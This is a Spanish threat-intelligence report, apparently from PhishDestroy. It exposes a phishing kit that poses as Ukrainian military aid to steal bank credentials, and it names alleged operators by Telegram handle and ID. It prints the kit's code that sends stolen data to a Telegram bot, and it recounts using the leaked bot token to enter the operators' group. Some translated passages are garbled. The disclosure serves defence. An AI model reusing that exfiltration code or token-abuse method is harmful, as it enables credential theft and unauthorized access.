Se descubre una red de phishing relacionada con la ayuda militar: Se han identificado cinco bancos como objetivos y se ha determinado quiénes son los responsables

Lo que descubrió PhishDestroy

El 20 de marzo de 2026, el proceso automatizado de detección de amenazas de PhishDestroy detectó dopomogvoina[.]sbs — un dominio recién registrado que aloja un sitio web de phishing que se hace pasar por «El escudo del defensor» (Escudo del Defensor), una fundación de ayuda militar ucraniana ficticia. La página web se dirige a veteranos del ejército ucraniano, heridos en combate y familiares de soldados caídos, prometiéndoles ayuda económica del Gobierno mientras sustrae las credenciales bancarias de cinco de los bancos más importantes de Ucrania.

A continuación se ofrece un desglose completo de todo lo que nuestro análisis automatizado ha revelado: la ingeniería social, la infraestructura técnica, el sistema de control de operadores en tiempo real y la identidad de las personas que lo gestionan.

Sección 1: El cebo — La falsa Fundación de Ayuda Militar

El dominio dopomogvoina[.]sbs se registró el 20 de marzo de 2026 a través de NICENIC International Group Co., Limited, un registrador con un historial bien documentado de respuestas lentas o inexistentes ante los casos de abuso. El .sbs TLD (Side-By-Side) es un gTLD de bajo coste que se utiliza con frecuencia para crear infraestructuras de phishing desechables.

El sitio web se presenta como un portal de ayuda profesional vinculado al Gobierno. La cabecera está ocupada por una bandera ucraniana, las imágenes militares le dan un aire de autenticidad y el texto está redactado cuidadosamente en ucraniano con un lenguaje burocrático que imita el de los programas gubernamentales oficiales.

Captura de pantalla 5: la página de inicio del sitio de phishing que se hace pasar por «Щит Захисника» (Escudo del Defensor).

Para ganarse la confianza de los usuarios, los operadores crearon un contador de estadísticas que aparecía en un lugar destacado de la página de inicio:

• 2.847 solicitudes — lo que significa que miles de personas ya han recibido ayuda
• Se han repartido 47,2 millones de ₴ — una cifra elevada, pero verosímil, en la UAH
• 19 programas — lo que sugiere una operación integral que abarca varios programas

Estas cifras son totalmente inventadas y están integradas directamente en el código fuente de la página, sin conexión alguna con el servidor. Su único objetivo es servir como prueba social para disipar las dudas de la víctima.

Sección 2: La trampa — 5 bancos, un objetivo

Tras hacer clic en «Подати заявку» (Enviar solicitud), a la víctima se le muestra una pantalla para seleccionar un banco. Aparecen como opciones cinco de los bancos minoristas más importantes de Ucrania, cada uno con su marca y logotipo oficiales. Es aquí donde la ingeniería social pasa de la manipulación emocional al robo técnico.

Captura de pantalla 6 — Pantalla de selección de banco. Cada opción da lugar a una secuencia personalizada de robo de credenciales.

El análisis del paquete de JavaScript del sitio reveló que cada banco tiene un secuencia única de recopilación de credenciales en varios pasos, adaptado al flujo de autenticación real de ese banco:

El desarrollo del ataque sigue el mismo patrón en todos los bancos:

Captura de pantalla 7 — Página de inicio de sesión clonada de PrivatBank.

Captura de pantalla 9 — Página de inicio de sesión de PUMB clonada.

Captura de pantalla 10 — Flujo completo del ataque: desde la página falsa de ayuda militar, pasando por la selección del banco, hasta el robo de credenciales y la apropiación de la cuenta.

La pila tecnológica: Aplicación web de página única (SPA) con React interfaz de usuario proporcionada a través de CDN de Cloudflare, con un Express.js servidor que gestiona la sustracción de credenciales. La arquitectura de React permite crear formularios de varios pasos que se integran a la perfección y que resultan indistinguibles de las interfaces bancarias legítimas.

Sección 3: Control del operador en tiempo real

No se trata de un simple programa de robo de credenciales con una base de datos estática. El kit de phishing incluye un Panel de control WebSocket en tiempo real que permite a un operador humano controlar cada sesión de las víctimas en tiempo real.

El punto final de WebSocket en wss://dopomogvoina[.]sbs/ws admite los siguientes tipos de mensajes:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Este control en tiempo real permite al operador:

• Forzar un estado de espera — mostrar el mensaje «Procesando su solicitud...» mientras acceden a la cuenta bancaria real de la víctima
• Redirigir a un paso concreto — volver a solicitar un código SMS si el primero ha caducado
• Mostrar mensajes de error falsos — «Código no válido, vuelva a introducirlo» para obtener varios tokens de autenticación de dos factores
• Haz preguntas personalizadas — solicitar la fecha de nacimiento, el número de tarjeta o cualquier otro dato durante la sesión

Captura de pantalla 8: formulario de introducción del número de teléfono utilizado para iniciar el robo de credenciales.

Captura de pantalla 11 — Panel del bot en tiempo real del operador para controlar las sesiones de las víctimas.

La información completa sustraída en cada sesión: phone, password, PIN, SMS code, card number, date of birth, y email.

Sección 4: Detrás de Cloudflare: dos proyectos, un servidor

El proxy de Cloudflare oculta el servidor de origen, pero el proceso de análisis de la infraestructura de PhishDestroy ha identificado la verdadera dirección IP de origen: 45.131.214[.]148, alojado en RapidSeedbox / LeaseWeb en los Países Bajos.

Un detalle importante: dopomogvoina[.]sbs se transmite a través de Cloudflare, ocultando su dirección IP de origen. Pero nuestro sistema también rastrea hlpforvpeople[.]sbs — un dominio relacionado registrado a través del mismo registrador NICENIC con patrones coincidentes. Ese dominio es NO está detrás de Cloudflare, revelando directamente su dirección IP de origen: 45.131.214[.]148.

Conectarse directamente a esta dirección IP — sin un Host encabezado — reveló algo inesperado: un una página de phishing totalmente diferente. En lugar de la ayuda militar a Ucrania, el servidor virtual predeterminado sirvió «Identificación sanitaria», una operación de phishing relacionada con un seguro médico indonesio. El mismo servidor, víctimas totalmente diferentes, un país totalmente diferente.

Captura de pantalla 12 — Dos operaciones de phishing paralelas que comparten el mismo servidor de origen: ayuda militar ucraniana (dopomogvoina) y seguro médico indonesio (HealthCare ID).

La plantilla de phishing indonesia es una kit conocido registrado en la base de datos de inteligencia sobre amenazas de PhishDestroy. Hemos observado variantes de esta misma plantilla en todo el sudeste asiático, dirigidas a instituciones financieras de Indonesia, Tailandia y Vietnam. Los operadores se limitan a cambiar las plantillas específicas de cada país, al tiempo que reutilizan la misma infraestructura de fondo.

Sección 5: El archivo config.json que lo reveló todo

Así es como un solo archivo mal configurado echó por tierra toda la operación, paso a paso.

Tras identificar el segundo proyecto del servidor de origen, el de PhishDestroy JS Analyzer —nuestra herramienta automatizada de análisis de JavaScript— se dirigió al paquete del sitio web de phishing indonesio en https://45.131.214[.]148/assets/index-ZMQxHb_h.js. El analizador extrajo todos los puntos de conexión de la API, las URL externas y las rutas de configuración del archivo JavaScript de 335 KB. Entre los hallazgos:

• Cinco puntos de conexión de la API en rezervtemka[.]cc — el panel C2 para la verificación de credenciales
• Una conexión WebSocket a wss://rezervtemka[.]cc
• Integración de Facebook Pixel para el seguimiento de víctimas
• Una referencia a /config.json — se carga en tiempo de ejecución para la configuración del bot de Telegram

Siguiendo esta pista, fuimos a buscar /config.json desde la IP de origen. Se podía acceder al archivo sin necesidad de autenticación: estaba en el directorio raíz del servidor web y cualquiera podía leerlo:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

El /config.json se podía acceder al archivo directamente desde la IP de origen — Sin autenticación, sin control de acceso, solo un simple archivo JSON ubicado en el directorio raíz del sitio web:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

El token de un bot de Telegram sirve tanto de nombre de usuario como de contraseña. Quien tenga el token puede realizar llamadas a la API en nombre de ese bot. Los administradores dejaron el suyo en un archivo de acceso público. Seis llamadas a la API más tarde, ya lo teníamos todo:

Captura de pantalla 13 — La cadena completa de OSINT: desde el archivo config.json expuesto hasta la identificación completa del operador en 6 llamadas a la API.

Desde un simple archivo mal configurado hasta la identificación completa de los operadores en seis solicitudes HTTP. Sin vulnerabilidades, sin acceso no autorizado: solo llamadas estándar a la API de Telegram Bot utilizando un token que los propios operadores dejaron expuesto.

Sección 6: Los operadores

Captura de pantalla 14 — El grupo de operadores de Telegram «Idr card», al que se ha tenido acceso gracias a la filtración del token del bot.

Propietario / Creador

MONETTI ESCOBAR

@monettiescobar

ID de Telegram: 8135223234

Telegram Premium, perfil empresarial

Zona horaria: UTC+3 (región de la CEI)

10 mensajes públicos — OPSEC estricta

Chat de TraFFeeQMedusa de Google AdsCanal de deepfakes

Operador / Tráfico

Tómate las cosas con calma

Buenos días

ID de Telegram: 6242202706

También conocido como: PapaZakonVor, Boa, bubullikk

261 mensajes repartidos en 12 grupos

DC2 — Ámsterdam, Países Bajos

CryptoGrabMercado STYXNivel CCEMPIRE CHATSolución Phoenix

Desarrollador / Programador

Devoys

@devosus

ID de Telegram: 8213612730

Desarrollador de kits de phishing — los operadores se refieren a él como «programador»

Se les pidió que «pensaran en la defensa» al descubrirse la filtración

Diseño que minimiza el impacto en el espacio público

Comprar @devosus ≈ «dev ops us» — el puesto de trabajo como nombre de usuario

Desarrollador de kitsInfraestructuraSeguridad

MONETTI ESCOBAR — El jefe

MONETTI mantiene una estricta seguridad operativa — solo 10 mensajes públicos divididos en dos grupos. Pero los grupos lo dicen todo: Chat de TraFFeeQ (arbitraje de tráfico con fines fraudulentos), Medusa de Google Ads (prácticas de «black hat» en Google Ads), y un Canal de deepfakes. En su perfil profesional de Telegram figura «Есть предложение» («Tengo una propuesta») — que anuncian abiertamente sus servicios. La zona horaria UTC+3 (la misma que la de Moscú, Minsk y Kiev) y el horario de atención al público las 24 horas del día, los 7 días de la semana, confirman que se trata de una empresa con sede en la CEI que opera sin descanso.

Bonya — El descuidado

A diferencia de la rigurosa seguridad operativa (OPSEC) de MONETTI, Bonya (antiguo alias: Padre del Derecho —algo así como «PapáLadrónPorLey»— dejó un rastro digital enorme — 261 mensajes repartidos entre 12 grupos clandestinos. Su historial de chat parece un currículum de delincuente:

Sus afiliaciones a diversos grupos ofrecen una visión completa: CryptoGrab (los que vacían carteras de criptomonedas), Mercado STYX (mercado negro de datos robados), Comprobador de CC de nivel (herramientas de validación de tarjetas de crédito), EMPIRE CHAT y Solución Phoenix (coordinación de fraudes). No se trata de un delincuente ocasional, sino de alguien integrado en el ecosistema de la ciberdelincuencia.

Devoys — El desarrollador

La columna vertebral técnica de la operación. Diseñada para tener una presencia pública mínima; cuando el grupo fue vulnerado, Bonya lo llamó expresamente: «@devosus, piensa en la defensa antes de que nos den una paliza». — «@devosus, pensemos en la defensa antes de que nos den una paliza». Su respuesta sarcástica ante la filtración — «¿Cuándo a la Interpol?» («cuándo interpolar») — lo que sugiere que no es la primera vez que se han salvado por los pelos.

Análisis del comportamiento: 261 mensajes descifrados

El canal de OSINT de PhishDestroy recopiló y tradujo los 261 mensajes públicos procedentes de Bonya a través de 12 grupos clandestinos de Telegram (junio de 2024 — marzo de 2026). Traducción automática mediante la API de DeepL con corrección manual del contexto. Los mensajes revelan un perfil operativo completo, clasificado a continuación por tipo de actividad delictiva.

Fraude bancario y phishing

«Mulas de dinero» y «retirada de efectivo»

Fraude de tráfico y uso indebido de la publicidad

MONETTI ESCOBAR: El jefe silencioso

En marcado contraste con los 261 mensajes de Bonya, MONETTI solo tiene 10 mensajes públicos — todo en un solo hilo en Chat de TraFFeeQ (Arbitraje de tráfico negro de ADS/SEO), en defensa de un compañero:

Los grupos de Telegram de MONETTI lo dicen todo: Medusa de Google Ads (fraude de PPC de «black hat»), un Canal de deepfakes (medios sintéticos para el fraude), y Charla sobre Marlboro (privado, desconocido). La suscripción a Telegram Premium, horario comercial 24 horas al día, 7 días a la semana, y «Есть предложение» («Tengo una propuesta») La biografía profesional de esta persona da a entender que se dedica a la ciberdelincuencia a tiempo completo.

Captura de pantalla 2 — Perfil de MONETTI en Telegram.

Captura de pantalla 3 — Perfil de Bonya. Fíjate en DC2 (Ámsterdam).

Sección 7: La habitación del pánico

Después de que PhishDestroy accediera al grupo de operadores a través del bot de Telegram expuesto, tuvo lugar el siguiente intercambio. El registro de la conversación que figura a continuación se ha traducido al inglés, conservando el ruso original en cursiva. Se ha ocultado la identidad utilizada para acceder.

El grupo se eliminó en cuestión de minutos. El mensaje de despedida de Bonya —«+»— y la respuesta de Devoys —«sí»— lo dicen todo: Sabían que estaban al descubierto, y su única opción era destruir las pruebas. Pero para entonces, los datos ya se habían recopilado.

Fíjate en el revelador comentario de Bonya: «También nos atacaron a través del bot ucraniano» — lo que confirma que ambos proyectos (el ucraniano y el indonesio) cuentan con el mismo equipo de operadores, y que no era la primera vez que su infraestructura se veía comprometida.

Sección 8: Qué pone esto de manifiesto

Cronología de la investigación

Dominios relacionados

Nuestro análisis identificó un segundo ámbito — hlpforvpeople[.]sbs — registrados a través del mismo proveedor de registro y con patrones de infraestructura coincidentes. Ambos dominios figuran en nuestra base de datos:

• Informe de PhishDestroy: dopomogvoina[.]sbs
• Informe de PhishDestroy: hlpforvpeople[.]sbs

Puntos clave

• La automatización es la única forma de no quedarse atrás. Los kits de phishing se implementan y se utilizan con fines maliciosos en cuestión de horas. La revisión manual no puede adaptarse a ese ritmo.
• Los operadores cometen errores. Un archivo de configuración expuesto en un proyecto secundario desmanteló toda una operación multinacional de phishing. Es difícil mantener una seguridad operativa (OPSEC) perfecta en todos los proyectos.
• La ingeniería social evoluciona al ritmo de la actualidad. La guerra, la ayuda humanitaria y los programas gubernamentales se utilizan cada vez más como señuelos para el phishing, ya que se dirigen a personas en situación de necesidad que son menos propensas a cuestionar su legitimidad.
• La reutilización de infraestructuras es la norma. Un servidor, dos proyectos de phishing, dos países, los mismos operadores. El análisis de las conexiones de la infraestructura revela mucho más que el análisis aislado de un solo dominio.

Aviso legal: Esta investigación se llevó a cabo íntegramente mediante reconocimiento pasivo y API públicas. No se realizó ningún acceso no autorizado a ningún sistema. Las llamadas a la API del bot de Telegram utilizaron un token que los operadores habían expuesto públicamente en un punto de acceso sin autenticación. Todos los nombres de dominio que aparecen en este artículo se han ocultado siguiendo la convención estándar de seguridad de la información.